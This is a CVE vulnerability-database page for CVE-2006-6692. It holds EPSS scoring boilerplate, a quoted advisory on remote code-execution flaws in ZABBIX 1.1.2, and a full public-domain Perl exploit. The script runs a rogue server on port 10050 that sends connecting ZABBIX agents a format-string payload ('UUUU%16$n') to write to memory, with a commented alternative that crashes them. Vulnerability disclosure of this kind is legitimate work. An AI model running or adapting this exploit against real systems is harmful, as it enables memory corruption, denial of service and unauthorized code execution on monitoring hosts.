CVE-2006-6692 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/20416/info ZABBIX is prone to multiple unspecified remote code-execution vulnerabilities. Reports indicate that these issues facilitate format-string and buffer-overflow attacks. A remote attacker may leverage these vulnerabilities to trigger denial-of-service conditions or to execute arbitrary code to gain unauthorized access to a vulnerable computer. This would occur in the context of the application. ZABBIX version 1.1.2 is reported vulnerable; other versions may be affected as well. #!/usr/bin/perl -- # zabbix-exploiter # by Ulf Harnhammar in 2006 # I hereby place this program in the public domain. use IO::Socket; $server = IO::Socket::INET->new( Proto => 'tcp', LocalPort => 10050, Listen => SOMAXCONN, Reuse => 1); die "can't create server\n" if !$server; while ($client = $server->accept()) { $client->autoflush(1); $key = <$client>; print $key; print $client 'UUUU%16$n'; # writes data to 0x55555555, at least on Debian testing # print $client '%n%n%n%n'; # crashes close $client; }